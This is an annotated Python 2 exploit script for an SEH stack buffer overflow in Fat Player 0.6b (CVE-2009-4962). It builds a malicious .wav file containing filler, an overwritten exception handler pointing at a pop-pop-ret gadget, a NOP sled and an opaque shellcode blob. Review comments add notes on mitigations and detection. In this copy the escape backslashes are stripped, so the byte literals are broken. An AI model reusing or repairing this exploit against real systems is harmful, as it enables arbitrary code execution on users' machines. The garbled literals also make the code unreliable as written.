
# Title : Fat Player 0.6b WAV File Processing Buffer Overflow (SEH)
# Published : 2010-08-09
# Author : Praveen Darshanam


#################################################################################################
#    	Stack-based buffer overflow in Fat Player 0.6b allows remote attackers to execute 
#	arbitrary code via a long string in a .wav file. NOTE: some of these details are 
#	obtained from third party information.
#
#    Reference:
#    	http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4962
#    	http://xforce.iss.net/xforce/xfdb/52713
#	http://sourceforge.net/projects/fatplayer/
#	http://www.exploit-db.com/exploits/9495/
#
#    Tested on: Windows XP SP3, FatPlayer 0.6b
#
#
#    This was strictly written for educational purposes. Use it at your own risk.
#    The author will not bear any responsibility for any damages whatsoever.
#
#        Author:	Praveen Darshanam
#        Email:		praveen[underscore]recker[at]sify.com
#	 Blog: 		http://darshanams.blogspot.com
#        Date:		10th August, 2010
#
#
#################################################################################################

# NOTE(review): Python 2 script (print statements, str used as a byte
# buffer). In this copy every "\x.." escape has lost its backslash ("xeb"
# instead of "\xeb") and the "\n" in the print strings likewise, so the
# literals as printed are plain ASCII letters, not the bytes the author
# intended. The listing is kept verbatim for analysis; it is not repaired here.
print "nFat Player 0.6b WAV File Processing Buffer Overflow (SEH)"

# 4132 bytes of filler precede the two 4-byte SEH values below; per the
# title this is the distance from the start of the file to the SEH record.
buff1 = "D" * 4132

# Per the variable names, nseh is the value that lands in the "next handler"
# slot and seh_ppr the value that lands in the handler slot, the latter being
# the 0x72D11F39 address in msacm32.drv noted on the comment line below.
# Mitigation context: an overwritten handler is only usable if the dispatcher
# accepts the address, which is what SafeSEH / SEHOP on the loaded modules
# and DEP are meant to prevent -- whether msacm32.drv lacked SafeSEH on the
# tested XP SP3 box is not stated on this page.
nseh = "xebx06x90x90"
seh_ppr = "x39x1fxd1x72"
#0x72D11F39      pop edi - pop - retbis	msacm32.drv

# Short NOP sled followed by an opaque payload blob. Its function is not
# documented on this page; treat it as untrusted code and do not execute it.
noop = "x90" * 10
code2exec = ("xdbxc0x31xc9xbfx7cx16x70xccxd9x74x24xf4xb1x1ex58x31x78x18x83xe8xfcx03x78x68xf4x85x30x78xbcx65xc9x78xb6x23xf5xf3xb4xaex7dx02xaax3ax32x1cxbfx62xedx1dx54xd5x66x29x21xe7x96x60xf5x71xcax06x35xf5x14xc7x7cxfbx1bx05x6bxf0x27xddx48xfdx22x38x1bxa2xe8xc3xf7x3bx7axcfx4cx4fx23xd3x53xa4x57xf7xd8x3bx83x8ex83x1fx57x53x64x51xa1x33xcdxf5xc6xf5xc1x7ex98xf5xaaxf1x05xa8x26x99x3dx3bxc0xd9xfex51x61xb6x0ex2fx85x19x87xb7x78x2fx59x90x7bxd7x05x7fxe8x7bxca")

# Trailing padding so the whole file is exactly 40000 bytes.
buff2 = "Z" * (40000 - len(buff1) - len(nseh) - len(seh_ppr) - len(noop) - len(code2exec))
# Detection note: the output is not a well-formed WAV at all -- it starts with
# 4132 'D' bytes and carries no RIFF/WAVE header, so a strict header check on
# .wav input rejects such a file before any chunk parsing happens, and a
# 40000-byte .wav consisting of long runs of a single byte is an easy
# signature for content scanning.
mal_buff = buff1 + nseh + seh_ppr + noop + code2exec + buff2

# Write the PoC file to the current directory.
# NOTE(review): the bare `except:` swallows every exception, including
# KeyboardInterrupt and SystemExit, and hides the actual reason the write
# failed; the narrow form would be `except IOError as e:` with `e` printed.
try:
	fatpwav = open ("fatplayerboseh.wav","w")
	fatpwav.write(mal_buff)
	fatpwav.close()
	print "nMalicious WAV File Created . . . !!"
	print "[+] Coded by Praveen Darshanam"
except:
	print "nUnable to Create Filen"